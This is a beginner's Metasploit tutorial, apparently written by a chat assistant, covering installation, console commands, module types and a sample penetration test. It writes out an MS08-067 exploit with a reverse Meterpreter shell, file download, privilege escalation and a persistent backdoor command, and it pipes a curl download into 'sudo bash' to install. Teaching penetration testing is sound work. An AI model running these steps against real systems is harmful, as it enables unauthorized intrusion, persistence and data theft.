Metasploit Tutorial

Introduction

Metasploit is a powerful and widely-used penetration testing framework that provides security researchers and professionals with the tools necessary to test system vulnerabilities, develop and execute exploit code, and perform various tasks related to cybersecurity. This comprehensive guide will walk you through the basics of Metasploit, its installation, usage, and advanced features.

Prerequisites

• A system with Kali Linux installed (Metasploit comes pre-installed on Kali Linux).

• Basic understanding of network protocols, operating systems, and cybersecurity concepts.

• A target machine for testing purposes (e.g., a vulnerable virtual machine like Metasploitable).

Installing Metasploit

Metasploit is pre-installed on Kali Linux. If you are using another Linux distribution or want to update Metasploit, follow these steps:

1. Update and Upgrade Your System:

    sudo apt-get update && sudo apt-get upgrade
   

2. Install Metasploit Framework:

    curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate | sudo bash
   

Starting Metasploit

1. Open Terminal and start Metasploit:

    sudo msfconsole
   

2. Metasploit Console:

   • Upon starting, you will see the Metasploit banner and the msf> prompt, indicating that Metasploit is ready for use.

Basic Commands

• Search: Find exploits, payloads, or auxiliary modules.

    search <term>
  

• Use: Load a specific module.

    use <module_path>
  

• Show Options: Display available options for a module.

    show options
  

• Set: Set options for the module.

    set <option_name> <value>
  

• Run/Exploit: Execute the loaded module.

    run
  

  or

    exploit
  

Metasploit Modules

Metasploit consists of several types of modules:

1. Exploits:

   • Code that takes advantage of a vulnerability in a system.

    use exploit/<module_path>

2. Payloads:

   • Code that runs on the target system after exploitation.

    set payload <payload_name>

3. Auxiliary:

   • Modules used for scanning, fuzzing, and other tasks that don't require exploitation.

    use auxiliary/<module_path>

4. Encoders:

   • Encode payloads to evade detection.

    use encoder/<encoder_name>

5. Nops:

   • No-operation instructions used to pad payloads.

    use nop/<nop_name>

Conducting a Penetration Test with Metasploit

Step 1: Information Gathering

Use auxiliary modules to gather information about the target.

1. Port Scanning with Nmap:

    nmap -sS -A <target_ip>
   

2. Service Enumeration:

    use auxiliary/scanner/portscan/tcp
    set RHOSTS <target_ip>
    set THREADS 10
    run
   

Step 2: Vulnerability Scanning

Identify vulnerabilities on the target system.

1. Using Vulnerability Scanners:

    use auxiliary/scanner/http/nikto
    set RHOSTS <target_ip>
    run
   

Step 3: Exploitation

Use exploits to gain access to the target system.

1. Search for Exploits:

    search exploit windows smb
   

2. Select and Configure an Exploit:

    use exploit/windows/smb/ms08_067_netapi
    set RHOST <target_ip>
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST <your_ip>
    run
   

Step 4: Post-Exploitation

Perform tasks after gaining access to the target system.

1. Meterpreter Session:

   • Upon successful exploitation, Metasploit will provide a Meterpreter session.

    meterpreter>

2. Gather Information:

   • Collect information from the target system.

    meterpreter> sysinfo
    meterpreter> getuid
    meterpreter> ipconfig

3. File System Navigation:

   • Browse the target file system.

    meterpreter> ls
    meterpreter> cd <directory>
    meterpreter> download <file>

4. Privilege Escalation:

   • Attempt to elevate privileges on the target system.

    meterpreter> getsystem

5. Maintaining Access:

   • Establish a persistent backdoor on the target system.

    run persistence -U -i 5 -p 4444 -r <your_ip>

Step 5: Reporting

Document your findings and create a report.

1. Generate Reports:

   • Use Metasploit Pro (commercial version) to generate reports.

    load report

2. Manual Documentation:

   • Note down vulnerabilities, exploits used, and outcomes.

Advanced Features

Armitage

A graphical front-end for Metasploit, Armitage, simplifies the penetration testing process.

1. Install Armitage:

    sudo apt-get install armitage
   

2. Start Armitage:

    sudo armitage
   

3. Using Armitage:

   • Provides a visual representation of targets and available exploits.

Metasploit Community and Pro

Metasploit Community and Pro editions offer additional features like automated exploits, advanced reporting, and team collaboration tools. Visit Rapid7's website for more information.

Conclusion

Metasploit is a versatile and powerful tool for penetration testers, security researchers, and ethical hackers. By understanding its modules, commands, and features, you can conduct thorough penetration tests and improve the security posture of your targets. Always ensure you have proper authorization before performing any penetration testing activities.

For further learning and resources, consider exploring:

• Metasploit Unleashed

• Rapid7's Metasploit Documentation

• Kali Linux Documentation

---

Feel free to ask if you need more detailed information on any specific part of this guide!